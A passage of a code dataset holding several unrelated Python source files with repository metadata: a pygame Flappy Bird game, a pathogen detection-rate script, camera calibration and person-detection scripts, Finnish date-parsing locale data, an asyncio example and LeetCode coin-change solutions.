player_mid_position < pipe_mid_position + 4:\n score += 1\n print(f\"Your Score is {score}\")\n GAME_SOUNDS['point'].play()\n\n # For movement of player\n if player_velocity_y < player_max_velocity_y and not player_flapped:\n player_velocity_y += player_acceleration_y\n\n if player_flapped:\n player_flapped = False\n player_height = GAME_SPRITES['player'].get_height()\n player_y = player_y + min(player_velocity_y, GROUND_Y - player_y - player_height)\n\n # move pipes to the left\n for u_pipe, l_pipe in zip(upper_pipe, lower_pipe):\n u_pipe['x'] += pipe_velocity_x\n l_pipe['x'] += pipe_velocity_x\n\n # add a new pipe when the first pipe is about to cross the leftmost part of the screen\n if 0 < upper_pipe[0]['x'] < 5:\n new_pipe = getRandomPipe()\n upper_pipe.append(new_pipe[0])\n lower_pipe.append(new_pipe[1])\n\n # if the pipe is out of screen, remove it\n if upper_pipe[0]['x'] < -GAME_SPRITES['pipe'][0].get_width():\n upper_pipe.pop(0)\n lower_pipe.pop(0)\n\n # Let's blit our sprites now\n SCREEN.blit(GAME_SPRITES['background'], (0, 0)) # blit background\n\n for u_pipe, l_pipe in zip(upper_pipe, lower_pipe): # blit pipes\n SCREEN.blit(GAME_SPRITES['pipe'][0], (u_pipe['x'], u_pipe['y'])) # blit upper pipes\n SCREEN.blit(GAME_SPRITES['pipe'][1], (l_pipe['x'], l_pipe['y'])) # blit lower pipes\n\n SCREEN.blit(GAME_SPRITES['base'], (base_x, GROUND_Y)) # blit base\n SCREEN.blit(GAME_SPRITES['player'], (player_x, player_y)) # blit player\n\n my_digits = [int(x) for x in list(str(score))]\n width = 0\n for digits in my_digits:\n width += GAME_SPRITES['numbers'][digits].get_width()\n x_offset = (SCREEN_WIDTH - width)/2\n\n for digits in my_digits:\n SCREEN.blit(GAME_SPRITES['numbers'][digits], (x_offset, SCREEN_WIDTH * 0.12))\n x_offset += GAME_SPRITES['numbers'][digits].get_width()\n pygame.display.update()\n FPS_CLOCK.tick(FPS)\n\n# ----------------------------------------------------------------------------------------------------- #\n\n\n# ----------------------------------- For random pipes ------------------------- #\n
def getRandomPipe():\n \"\"\"\n generate two pipes (one rotated for top, and one bottom straight ) for blitting on the screen\n \"\"\"\n pipe_height = GAME_SPRITES['pipe'][0].get_height() # For Pipe Height\n offset = SCREEN_HEIGHT / 3 # For top rotated pipe\n y2 = offset + random.randrange(0, int(SCREEN_HEIGHT - GAME_SPRITES['base'].get_height() + 1.2 * offset))\n # lower pipe y position\n\n pipe_x = SCREEN_WIDTH + 10 # For x position of upper pipe and lower pipe\n y1 = pipe_height - y2 + offset # upper pipe y position\n pipe = [\n {'x': pipe_x, 'y': -y1}, # For upper pipe (that's why y is -y1)\n {'x': pipe_x, 'y': y2} # For lower pipe\n ]\n return pipe\n# ----------------------------------------------------------------------------------- #\n\n\n
def isCollide(player_x, player_y, upper_pipe, lower_pipe):\n if player_y > GROUND_Y - 25 or player_y < 0:\n GAME_SOUNDS['hit'].play()\n return True\n\n for pipe in upper_pipe:\n pipe_height = GAME_SPRITES['pipe'][0].get_height()\n if player_y < pipe_height + pipe['y'] and abs(player_x - pipe['x']) < GAME_SPRITES['pipe'][0].get_width():\n GAME_SOUNDS['hit'].play()\n return True\n\n for pipe in lower_pipe:\n if (player_y + GAME_SPRITES['player'].get_height() > pipe['y']) and abs(player_x - pipe['x']) < \\\n GAME_SPRITES['pipe'][0].get_width():\n GAME_SOUNDS['hit'].play()\n return True\n\n return False\n\n# -------------------------------------------------------------------------------------- #\n# ------------------------------------------ !!!!! ---------------------------------------------- #\n\n\n
if __name__ == '__main__':\n # This will be the main point from where our Game starts\n pygame.init() # initialize all imported pygame modules\n FPS_CLOCK = pygame.time.Clock() # create an object to help track time\n pygame.display.set_caption('FlappyBird By Sheheryar') # Set the current window caption\n\n # ---------------------------- Adding All Images in Game_Sprites Dictionary ------------------------ #\n\n GAME_SPRITES['numbers'] = (\n pygame.image.load('gallery/Sprites/Zero.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/One.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Two.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Three.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Four.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Five.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Six.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Seven.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Eight.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Nine.png').convert_alpha()\n ) # Adding all numbers images in Game Sprites Dictionary after storing in a tuple\n # Convert_alpha == change the pixel format of an image including per pixel alphas)\n\n GAME_SPRITES['message'] = pygame.image.load('gallery/Sprites/message.png').convert_alpha() # Adding a message image\n GAME_SPRITES['base'] = pygame.image.load('gallery/Sprites/Base.png').convert_alpha() # Adding a Base image\n GAME_SPRITES['background'] = pygame.image.load(BACKGROUND).convert() # Adding a Background image\n GAME_SPRITES['player'] = pygame.image.load(PLAYER).convert_alpha() # Adding a Bird image\n\n GAME_SPRITES['pipe'] = (pygame.transform.rotate(pygame.image.load(PIPE).convert_alpha(), 180), # Rotate image (180)\n pygame.image.load(PIPE).convert_alpha()) # Pipe image for the bottom pipe\n # -------------------------------------------------------------------------------------- #\n\n # ---------------------------- Adding All Sounds in Game_Sounds Dictionary ------------------------ #\n\n # pygame.mixer.Sound() == Create a new Sound object from a file or buffer object\n GAME_SOUNDS['die'] = pygame.mixer.Sound('gallery/Audio/die.wav')\n GAME_SOUNDS['hit'] = pygame.mixer.Sound('gallery/Audio/hit.wav')\n GAME_SOUNDS['point'] = pygame.mixer.Sound('gallery/Audio/point.wav')\n GAME_SOUNDS['swoosh'] = pygame.mixer.Sound('gallery/Audio/swooshing.wav')\n GAME_SOUNDS['wing'] = pygame.mixer.Sound('gallery/Audio/wing.wav')\n\n # Game Loop\n while True:\n welcomeScreen() # Shows the welcome screen until the user presses a button\n mainGame() # This is the main Game Function\n","repo_name":"CaptainSherry49/Python-Project-Beginner-to-Advance","sub_path":"Flappy Bird/Project 2 - Coding Flappy Bird Game.py","file_name":"Project 2 - Coding Flappy Bird Game.py","file_ext":"py","file_size_in_byte":12025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"11286749801","text":"import heapq\njianchu_path = 
r'C:\\Users\\邓秋洋\\Desktop\\07.analysis_bypogenData\\病原数据按照组织归类SDSMRN版\\真菌不同类型不同菌株梯度检出率统计-SDSMRN\\不同类型下的不同菌株的检出率03版.txt'\nfilter_jianchu_path = r'C:\\Users\\邓秋洋\\Desktop\\07.analysis_bypogenData\\病原数据按照组织归类SDSMRN版\\真菌不同类型不同菌株梯度检出率统计-SDSMRN\\jianchulv2.csv'\nf = open(jianchu_path,'r',encoding = 'gbk')\no = open(filter_jianchu_path,'w', encoding ='gbk')\nf.readline()\norgan_dict = {}\npathogen_list = []\nfor line in f.readlines():\n if line == '\\n':\n continue\n name = line.rstrip().split()[0].split('_')[0]\n species = line.rstrip().split()[0].split('_')[2] + ' ' + line.rstrip().split()[0].split('_')[3].split(':')[0]\n organ_dict_key = name\n organ_dict_value = (species,line.rstrip().split()[1:])\n organ_dict.setdefault(organ_dict_key,[]).append(organ_dict_value)\norgan_species_rata_list = []\nspecies_set = []\nfor organ_name in organ_dict.keys():\n rate_list = []\n for species,jianchu_rate in organ_dict[organ_name]:\n rate_list.append(float(jianchu_rate[0].strip('%')))\n a_max_index = []\n for i in range(25):\n inf = 0\n a_max_index.append(rate_list.index(max(rate_list)))\n rate_list[rate_list.index(max(rate_list))] =inf\n species_rata_list = [organ_dict[organ_name][i] for i in a_max_index]\n species_set.append(species_rata_list)\n organ_species_rata_list.append((organ_name,species_rata_list))\nfor i in organ_species_rata_list:\n organ_name,species_rata_list = i\n o.write(organ_name )\n [o.write(','+str(i)) for i in range(1,21)]\n o.write('\\n')\n for species,rate_list in species_rata_list:\n o.write(species)\n # print(type(rate_list))\n rate_temp = [float(i.strip('%')) for i in rate_list]\n [o.write(',' + str(i)) for i in rate_temp]\n o.write('\\n')\n o.write('\\n')\n","repo_name":"quincy-deng/pathogen-in-BGI","sub_path":"09.已完成/01.不同采样部位病原菌水平分析/08.Training/huatu.py","file_name":"huatu.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"40331150550","text":"'''Calibrate camera intrinsics given checkerboard videos (performed individually) and selected frame folder\n'''\nimport argparse\nimport cv2\nimport numpy as np\nimport os\nimport glob\nimport pickle\n\ndef calibrate_cam(video_path, frames=[], show_img=False):\n # Set up calibration flags\n CHECKERBOARD = (13,16)\n SQUARE_SIZE = 40.0\n subpix_criteria = (cv2.TERM_CRITERIA_EPS+cv2.TERM_CRITERIA_MAX_ITER, 30, 0.1)\n calibration_flags = cv2.fisheye.CALIB_RECOMPUTE_EXTRINSIC+cv2.fisheye.CALIB_FIX_SKEW+cv2.fisheye.CALIB_CHECK_COND\n\n objp = np.zeros((1, CHECKERBOARD[0]*CHECKERBOARD[1], 3), np.float32)\n objp[0,:,:2] = np.mgrid[0:CHECKERBOARD[0], 0:CHECKERBOARD[1]].T.reshape(-1, 2) * SQUARE_SIZE\n\n _img_shape = None\n objpoints = [] # 3d point in real world space\n imgpoints = [] # 2d points in image plane.\n\n cap = cv2.VideoCapture(video_path)\n\n for frame in frames:\n cap.set(cv2.CAP_PROP_POS_FRAMES, frame)\n _, img = cap.read()\n if _img_shape == None:\n _img_shape = img.shape[:2]\n else:\n assert _img_shape == img.shape[:2], \"All images must share the same size.\"\n \n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n \n \n # Find the chess board corners\n ret, corners = cv2.findChessboardCorners(gray, CHECKERBOARD, cv2.CALIB_CB_ADAPTIVE_THRESH+cv2.CALIB_CB_FAST_CHECK+cv2.CALIB_CB_NORMALIZE_IMAGE)\n # If found, add object points, image points (after refining them)\n if ret == True:\n objpoints.append(objp)\n corners2 = cv2.cornerSubPix(gray,corners,(3,3),(-1,-1),subpix_criteria)\n imgpoints.append(corners2)\n\n if show_img:\n 
cv2.drawChessboardCorners(img, CHECKERBOARD, corners2, ret)\n cv2.imshow('Img', img)\n cv2.waitKey(1)\n\n rms, mtx, dist, rvecs, tvecs = \\\n cv2.fisheye.calibrate(\n objpoints,\n imgpoints,\n gray.shape[::-1],\n None,\n None,\n None,\n None,\n calibration_flags,\n (cv2.TERM_CRITERIA_EPS+cv2.TERM_CRITERIA_MAX_ITER, 30, 1e-6)\n )\n\n print(\"DIM=\" + str(_img_shape[::-1]))\n print(\"K=np.array(\" + str(mtx.tolist()) + \")\")\n print(\"D=np.array(\" + str(dist.tolist()) + \")\")\n print(\"RMS: \", rms)\n\n return mtx, dist\n\ndef calibrate_folder(folder, frame_folder, output='cam_params.pkl', img_count=100):\n def get_frames(paths):\n frames = []\n for path in paths:\n curr_id = os.path.split(path)[-1]\n curr_id = int(''.join(x for x in curr_id if x.isdigit()))\n frames.append(curr_id)\n return frames\n\n videos = sorted(glob.glob(os.path.join(folder, '*.mp4')))\n \n imgs = sorted(glob.glob(os.path.join(frame_folder, '*.png')), key=os.path.getmtime)\n frames = get_frames(imgs)\n\n if len(frames) > img_count:\n frames = np.random.choice(frames, img_count, replace=False)\n\n cams = []\n for video in videos:\n K, D = calibrate_cam(video, frames)\n cam = {\n 'K': K, # intrinsics\n 'D': D # distortion coefficients\n }\n cams.append(cam)\n\n with open(output, 'wb') as handle:\n pickle.dump(cams, handle)\n\ndef check_calibration():\n with open('cam_params.pkl', 'rb') as handle:\n b = pickle.load(handle)\n print(b)\n\ndef get_opts():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('root_dir', type=str,\n help='root directory of video folder')\n parser.add_argument('--frame_folder', type=str,\n help='directory of predetermined frames')\n parser.add_argument('--output', type=str,\n help='output filename')\n parser.add_argument('--img_count', type=int,\n help='max image count to use', default=100)\n return parser.parse_args()\n\nif __name__ == '__main__':\n args = get_opts()\n calibrate_folder(args.root_dir, args.frame_folder, args.output, args.img_count)","repo_name":"ken2576/multiview_preprocessing","sub_path":"calib_intrinsics_from_folder.py","file_name":"calib_intrinsics_from_folder.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"21492015473","text":"###################################################################################\n# This file is part of GaitUtils.\n# This code is offered without any warranty or support for only research purposes.\n#\n# If you either use this code or find useful this repository, please, cite any of the following related works:\n# [A] Francisco M. Castro, Manuel J. Marín-Jiménez, Nicolás Guil, Santiago Lopez Tapia, Nicolas Pérez de la Blanca:\n# Evaluation of Cnn Architectures for Gait Recognition Based on Optical Flow Maps. BIOSIG 2017: 251-258\n# [B] Rubén Delgado-Escaño, Francisco M. Castro, Julián Ramos Cózar, Manuel J. Marín-Jiménez, Nicolás Guil:\n# MuPeG - The Multiple Person Gait Framework. Sensors 20(5): 1358 (2020)\n# [C] Francisco M. Castro, Manuel J. Marín-Jiménez, Nicolás Guil, Nicolás Pérez de la Blanca:\n# Multimodal feature fusion for CNN-based gait recognition: an empirical comparison. Neural Comput. Appl. 
32(17): 14173-14193 (2020)\n###################################################################################\n\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport argparse\nimport glob\nimport os\nimport pickle\n\n# Detection class.\nclass DetectionModel(object):\n\tdef __init__(self, model_path):\n\t\t\"\"\"Creates and loads pretrained deeplab model.\"\"\"\n\t\tself.graph = tf.Graph()\n\t\twith tf.gfile.GFile(model_path, 'rb') as fid:\n\t\t\tod_graph_def = tf.GraphDef.FromString(fid.read())\n\n\t\twith self.graph.as_default():\n\t\t\ttf.import_graph_def(od_graph_def, name='')\n\n\t\tself.sess = tf.Session(graph=self.graph)\n\n\tdef run(self, image):\n\t\t\"\"\"Runs inference on a single image.\n\n\t\tArgs:\n\t\t\timage: A PIL.Image object, raw input image.\n\n\t\tReturns:\n\t\t\tresized_image: RGB image resized from original input image.\n\t\t\tseg_map: Segmentation map of `resized_image`.\n\t\t\"\"\"\n\t\t# Get handles to input and output tensors\n\t\tops = self.graph.get_operations()\n\t\tall_tensor_names = {output.name for op in ops for output in op.outputs}\n\t\ttensor_dict = {}\n\t\tfor key in [\n\t\t\t'num_detections', 'detection_boxes', 'detection_scores',\n\t\t\t'detection_classes', 'detection_masks'\n\t\t]:\n\t\t\ttensor_name = key + ':0'\n\t\t\tif tensor_name in all_tensor_names:\n\t\t\t\ttensor_dict[key] = self.graph.get_tensor_by_name(\n\t\t\t\t\ttensor_name)\n\n\t\timage_tensor = self.graph.get_tensor_by_name('image_tensor:0')\n\n\t\t# Run inference\n\t\toutput_dict = self.sess.run(tensor_dict,\n\t\t feed_dict={image_tensor: np.expand_dims(image, 0)})\n\n\t\t# all outputs are float32 numpy arrays, so convert types as appropriate\n\t\toutput_dict['num_detections'] = int(output_dict['num_detections'][0])\n\t\toutput_dict['detection_classes'] = output_dict[\n\t\t\t'detection_classes'][0].astype(np.uint8)\n\t\toutput_dict['detection_boxes'] = output_dict['detection_boxes'][0]\n\t\toutput_dict['detection_scores'] = output_dict['detection_scores'][0]\n\n\t\treturn output_dict\n\n# Prepare input\n# Input arguments\nparser = argparse.ArgumentParser(description='Build Optical Flow dataset. 
Note that no data augmentation is applied')\n\nparser.add_argument('--videodir', type=str, required=False,\n default='/home/GAIT_local/Datasets/TUM_GAID/video',\n\t\t\t\t\thelp='Full path to original videos directory')\n\nparser.add_argument('--outdir', type=str, required=False,\n default='/home/GAIT_local/TUM_GAID_bb/',\n help=\"Full path for output files.\")\n\nparser.add_argument('--fpatt', type=str, required=False,\n default='*.avi',\n help=\"Video file pattern.\")\n\nargs = parser.parse_args()\n\nvideosdir = args.videodir\noutdir = args.outdir\nfpatt = args.fpatt\n\nif not os.path.exists(outdir):\n\tos.makedirs(outdir)\n\nvideos = glob.glob(os.path.join(videosdir, fpatt))\nmodel = DetectionModel('detection_model/frozen_inference_graph.pb')\n\nprint(\"* Found {} videos.\".format(len(videos)))\nfor i in range(len(videos)):\n\t# VideoCapture to extract the frames.\n\tcap = cv2.VideoCapture(videos[i])\n\n\tvideoname, ext = os.path.splitext(os.path.basename(videos[i]))\n\n\tboxes = []\n\tscores = []\n\tframes = []\n\tframe_ix = 0\n\twhile (cap.isOpened()):\n\t\t# Capture frame-by-frame\n\t\tret, frame = cap.read()\n\t\tif ret == True:\n\t\t\toutput_dict = model.run(frame)\n\n\t\t\t# Remove zero-score detections.\n\t\t\tboxes_ = []\n\t\t\tscores_ = []\n\t\t\tboxes_temp = output_dict['detection_boxes']\n\t\t\tclasses_temp = output_dict['detection_classes']\n\t\t\tscores_temp = output_dict['detection_scores']\n\t\t\tfor i in range(boxes_temp.shape[0]):\n\t\t\t\tif scores_temp[i] > 0 and classes_temp[i] == 1: # Only persons\n\t\t\t\t\tboxes_.append(boxes_temp[i])\n\t\t\t\t\tscores_.append(scores_temp[i])\n\n\t\t\tboxes.append(np.asarray(boxes_))\n\t\t\tscores.append(np.asarray(scores_))\n\t\t\tframes.append(frame_ix)\n\t\telse:\n\t\t\tbreak\n\n\t\tframe_ix = frame_ix + 1\n\t# Write output file\n\toutpath = os.path.join(outdir, videoname + '.pkl')\n\twith open(outpath, 'wb') as output:\n\t\tpickle.dump([boxes, scores, frames], output, pickle.HIGHEST_PROTOCOL)\n\nprint(\"Done!\")\n","repo_name":"avagait/gaitutils","sub_path":"detection/detect_people.py","file_name":"detect_people.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"12852286846","text":"info = {\n \"name\": \"fi\",\n \"date_order\": \"DMY\",\n \"january\": [\n \"tammi\",\n \"tammik\",\n \"tammikuu\",\n \"tammikuuta\",\n \"tammikuussa\"\n ],\n \"february\": [\n \"helmi\",\n \"helmik\",\n \"helmikuu\",\n \"helmikuuta\",\n \"helmikuussa\"\n ],\n \"march\": [\n \"maalis\",\n \"maalisk\",\n \"maaliskuu\",\n \"maaliskuuta\",\n \"maaliskuussa\"\n ],\n \"april\": [\n \"huhti\",\n \"huhtik\",\n \"huhtikuu\",\n \"huhtikuuta\",\n \"huhtikuussa\"\n ],\n \"may\": [\n \"touko\",\n \"toukok\",\n \"toukokuu\",\n \"toukokuuta\",\n \"toukokuussa\"\n ],\n \"june\": [\n \"kesä\",\n \"kesäk\",\n \"kesäkuu\",\n \"kesäkuuta\",\n \"kesäkuussa\"\n ],\n \"july\": [\n \"heinä\",\n \"heinäk\",\n \"heinäkuu\",\n \"heinäkuuta\",\n \"heinäkuussa\"\n ],\n \"august\": [\n \"elo\",\n \"elok\",\n \"elokuu\",\n \"elokuuta\",\n \"elokuussa\"\n ],\n \"september\": [\n \"syys\",\n \"syysk\",\n \"syyskuu\",\n \"syyskuuta\",\n \"Syyskuussa\"\n ],\n \"october\": [\n \"loka\",\n \"lokak\",\n \"lokakuu\",\n \"lokakuuta\",\n \"Lokakuussa\"\n ],\n \"november\": [\n \"marras\",\n \"marrask\",\n \"marraskuu\",\n \"marraskuuta\",\n \"Marraskuussa\"\n ],\n \"december\": [\n \"joulu\",\n \"jouluk\",\n \"joulukuu\",\n \"joulukuuta\",\n \"Joulukuussa\"\n ],\n \"monday\": [\n 
\"ma\",\n \"maanantai\",\n \"maanantaina\"\n ],\n \"tuesday\": [\n \"ti\",\n \"tiistai\",\n \"tiistaina\"\n ],\n \"wednesday\": [\n \"ke\",\n \"keskiviikko\",\n \"keskiviikkona\"\n ],\n \"thursday\": [\n \"to\",\n \"torstai\",\n \"torstaina\"\n ],\n \"friday\": [\n \"pe\",\n \"perjantai\",\n \"perjantaina\"\n ],\n \"saturday\": [\n \"la\",\n \"lauantai\",\n \"lauantaina\"\n ],\n \"sunday\": [\n \"su\",\n \"sunnuntai\",\n \"sunnuntaina\"\n ],\n \"am\": [\n \"ap\"\n ],\n \"pm\": [\n \"ip\"\n ],\n \"year\": [\n \"v\",\n \"vuosi\",\n \"vuotta\",\n \"vv\",\n \"vuonna\",\n \"vuoden\"\n ],\n \"month\": [\n \"kk\",\n \"kuukausi\",\n \"kuukautta\",\n \"kuukauden\"\n ],\n \"week\": [\n \"viikko\",\n \"vk\",\n \"viikkoa\",\n \"vko\",\n \"viikon\"\n ],\n \"day\": [\n \"pv\",\n \"päivä\",\n \"päivää\",\n \"p\",\n \"pvä\",\n \"pvää\",\n \"päivän\"\n ],\n \"hour\": [\n \"t\",\n \"tunti\",\n \"tuntia\",\n \"tunnin\"\n ],\n \"minute\": [\n \"min\",\n \"minuutti\",\n \"minuuttia\",\n \"minuutin\"\n ],\n \"second\": [\n \"s\",\n \"sekunti\",\n \"sekuntia\",\n \"sekuntti\",\n \"sekunttia\",\n \"sekuntin\",\n \"sekunnin\"\n ],\n \"relative-type\": {\n \"0 day ago\": [\n \"tänään\"\n ],\n \"0 hour ago\": [\n \"tunnin sisällä\",\n \"tämän tunnin aikana\"\n ],\n \"0 minute ago\": [\n \"minuutin sisällä\",\n \"tämän minuutin aikana\"\n ],\n \"0 month ago\": [\n \"tässä kk\",\n \"tässä kuussa\"\n ],\n \"0 second ago\": [\n \"nyt\"\n ],\n \"0 week ago\": [\n \"tällä viikolla\",\n \"tällä vk\"\n ],\n \"0 year ago\": [\n \"tänä v\",\n \"tänä vuonna\"\n ],\n \"1 day ago\": [\n \"eilen\"\n ],\n \"1 month ago\": [\n \"viime kk\",\n \"viime kuussa\"\n ],\n \"1 week ago\": [\n \"viime viikolla\",\n \"viime vk\"\n ],\n \"1 year ago\": [\n \"viime v\",\n \"viime vuonna\"\n ],\n \"in 1 day\": [\n \"huom\",\n \"huomenna\"\n ],\n \"in 1 month\": [\n \"ensi kk\",\n \"ensi kuussa\"\n ],\n \"in 1 week\": [\n \"ensi viikolla\",\n \"ensi vk\"\n ],\n \"in 1 year\": [\n \"ensi v\",\n \"ensi vuonna\"\n ],\n \"2 year ago\": [\n \"toissa vuonna\"\n ],\n \"2 month ago\": [\n \"toissa kuussa\"\n ],\n \"2 week ago\": [\n \"toissa viikolla\"\n ],\n \"2 day ago\": [\n \"toissa päivänä\"\n ]\n },\n \"relative-type-regex\": {\n \"\\\\1 day ago\": [\n \"(\\\\d+[.,]?\\\\d*) pv sitten\",\n \"(\\\\d+[.,]?\\\\d*) päivä sitten\",\n \"(\\\\d+[.,]?\\\\d*) päivää sitten\"\n ],\n \"\\\\1 hour ago\": [\n \"(\\\\d+[.,]?\\\\d*) t sitten\",\n \"(\\\\d+[.,]?\\\\d*) tunti sitten\",\n \"(\\\\d+[.,]?\\\\d*) tuntia sitten\"\n ],\n \"\\\\1 minute ago\": [\n \"(\\\\d+[.,]?\\\\d*) min sitten\",\n \"(\\\\d+[.,]?\\\\d*) minuutti sitten\",\n \"(\\\\d+[.,]?\\\\d*) minuuttia sitten\"\n ],\n \"\\\\1 month ago\": [\n \"(\\\\d+[.,]?\\\\d*) kk sitten\",\n \"(\\\\d+[.,]?\\\\d*) kuukausi sitten\",\n \"(\\\\d+[.,]?\\\\d*) kuukautta sitten\"\n ],\n \"\\\\1 second ago\": [\n \"(\\\\d+[.,]?\\\\d*) s sitten\",\n \"(\\\\d+[.,]?\\\\d*) sekunti sitten\",\n \"(\\\\d+[.,]?\\\\d*) sekuntia sitten\"\n ],\n \"\\\\1 week ago\": [\n \"(\\\\d+[.,]?\\\\d*) viikko sitten\",\n \"(\\\\d+[.,]?\\\\d*) viikkoa sitten\",\n \"(\\\\d+[.,]?\\\\d*) vk sitten\"\n ],\n \"\\\\1 year ago\": [\n \"(\\\\d+[.,]?\\\\d*) v sitten\",\n \"(\\\\d+[.,]?\\\\d*) vuosi sitten\",\n \"(\\\\d+[.,]?\\\\d*) vuotta sitten\"\n ],\n \"in \\\\1 day\": [\n \"(\\\\d+[.,]?\\\\d*) pv päästä\",\n \"(\\\\d+[.,]?\\\\d*) päivän päästä\"\n ],\n \"in \\\\1 hour\": [\n \"(\\\\d+[.,]?\\\\d*) t päästä\",\n \"(\\\\d+[.,]?\\\\d*) tunnin päästä\"\n ],\n \"in \\\\1 minute\": [\n \"(\\\\d+[.,]?\\\\d*) min päästä\",\n \"(\\\\d+[.,]?\\\\d*) 
minuutin päästä\"\n ],\n \"in \\\\1 month\": [\n \"(\\\\d+[.,]?\\\\d*) kk päästä\",\n \"(\\\\d+[.,]?\\\\d*) kuukauden päästä\"\n ],\n \"in \\\\1 second\": [\n \"(\\\\d+[.,]?\\\\d*) s päästä\",\n \"(\\\\d+[.,]?\\\\d*) sekunnin päästä\"\n ],\n \"in \\\\1 week\": [\n \"(\\\\d+[.,]?\\\\d*) viikon päästä\",\n \"(\\\\d+[.,]?\\\\d*) vk päästä\"\n ],\n \"in \\\\1 year\": [\n \"(\\\\d+[.,]?\\\\d*) v päästä\",\n \"(\\\\d+[.,]?\\\\d*) vuoden päästä\"\n ]\n },\n \"locale_specific\": {},\n \"skip\": [\n \":n\",\n \" \",\n \"'\",\n \",\",\n \"-\",\n \".\",\n \"/\",\n \";\",\n \"@\",\n \"[\",\n \"]\",\n \"|\",\n \",\"\n ],\n \"sentence_splitter_group\": 1,\n \"ago\": [\n \"sitten\"\n ],\n \"in\": [\n \"kuluttua\",\n \"päästä\"\n ],\n \"simplifications\": [\n {\n \"(\\\\d+[.,]?\\\\d*) (sekunnin|sekuntin|minuutin|tunnin|päivän|viikon|kuukauden|vuoden) (päästä|kuluttua)\": \"\\\\3 \\\\1 \\\\2\"\n }\n ]\n}\n","repo_name":"scrapinghub/dateparser","sub_path":"dateparser/data/date_translation_data/fi.py","file_name":"fi.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"fi","doc_type":"code","stars":2374,"dataset":"github-code","pt":"79"} +{"seq_id":"11896831132","text":"import asyncio\n\n\nasync def say_what(delay, name):\n await asyncio.sleep(delay)\n return f'Say what {name}'\n\n\nasync def main():\n print(asyncio.all_tasks())\n tasks1 = asyncio.create_task(say_what(2, 'Dave'))\n tasks2 = asyncio.create_task(say_what(1, 'Matt'))\n await tasks1\n await tasks2\n print(f'Result task {tasks1.result()}')\n print(f'Result task {tasks2.result()}')\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"Gusakovskiy/goit_python_web","sub_path":"module_6/example_tasks.py","file_name":"example_tasks.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"30419331847","text":"from leezy import Solution, solution\n\n\nclass Q322(Solution):\n\n @solution\n def change_2D(self, coins, amount):\n # 1696ms 14.85%\n # this shares the similar pattern with 518. 
unbounded knapsack problem\n # dp[i][j] means minimum coins to sum up to amount j using coins[i:]\n # dp[i][j] = min(dp[i-1][j], dp[i][j-coin]+1)\n N, MAX = len(coins), amount + 1\n dp = [[MAX] * (amount+1) for _ in range(N+1)]\n for i in range(N+1):\n dp[i][0] = 0\n for i in range(1, N+1):\n coin = coins[i-1]\n for j in range(1, amount+1):\n dp[i][j] = dp[i-1][j] # do not use current coin\n if j >= coin:\n # use current coin\n dp[i][j] = min(dp[i][j], dp[i][j-coin]+1)\n return dp[N][amount] if dp[N][amount] != MAX else -1\n\n @solution\n def change_1D(self, coins, amount):\n # 960ms 81.72%\n MAX = amount + 1\n dp = [MAX] * (amount+1)\n dp[0] = 0\n for coin in coins:\n for j in range(coin, amount+1):\n dp[j] = min(dp[j], dp[j-coin]+1)\n return dp[amount] if dp[amount] != MAX else -1\n\n @solution\n def coinChange(self, coins, amount):\n # 1068ms\n if amount < 0:\n return -1\n coins = sorted(coins)\n dp = [0] + [float('inf')] * amount\n for i in range(1, amount+1):\n for c in coins:\n if c > i:\n break\n dp[i] = min(dp[i], dp[i-c]+1)\n return dp[amount] if dp[amount] != float('inf') else -1\n\n @solution\n def coin_change(self, coins, amount):\n # 1996ms\n memo = {}\n coins = sorted(coins)\n r = self.dfs(coins, amount, memo)\n return r if r != float('inf') else -1\n\n def dfs(self, coins, amount, memo):\n if amount == 0:\n return 0\n if amount in memo:\n return memo[amount]\n\n r = float('inf')\n for c in coins:\n if c > amount:\n break\n r = min(r, self.dfs(coins, amount - c, memo)+1)\n memo[amount] = r\n return r\n\n @solution\n def coin_change_prune(self, coins, amount):\n least = [float('inf')]\n coins = sorted(coins, reverse=True)\n self.dfs_prune_boilerplate(coins, 0, amount, 0, least)\n return least[0] if least[0] != float('inf') else -1\n\n def dfs_prune(self, coins, s, amount, count, least):\n # 144ms 99.23%\n c = coins[s]\n if s == len(coins) - 1: # quit earlier\n if amount % c == 0:\n least[0] = min(least[0], count + amount // c)\n else:\n for k in range(amount // c, -1, -1):\n if count + k >= least[0]: # !! 
important\n break\n self.dfs_prune(coins, s+1, amount - k*c, count+k, least)\n\n def dfs_prune_boilerplate(self, coins, s, amount, count, least):\n # 192ms\n if s >= len(coins):\n if amount == 0:\n least[0] = min(least[0], count)\n return\n c = coins[s]\n for k in range(amount // c, -1, -1):\n if count + k >= least[0]:\n break\n self.dfs_prune_boilerplate(\n coins, s+1, amount - k*c, count+k, least)\n\n\ndef main():\n q = Q322()\n q.add_args([1, 2, 5], 11)\n q.add_args([1, 2, 5], 0)\n q.add_args([1, 2, 5], 53)\n q.add_args([2, 5], 1)\n q.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aptend/leetcode-rua","sub_path":"Python/322 - Coin Change/322_coin-change.py","file_name":"322_coin-change.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"73255180735","text":"import os\n\nfrom pydub import 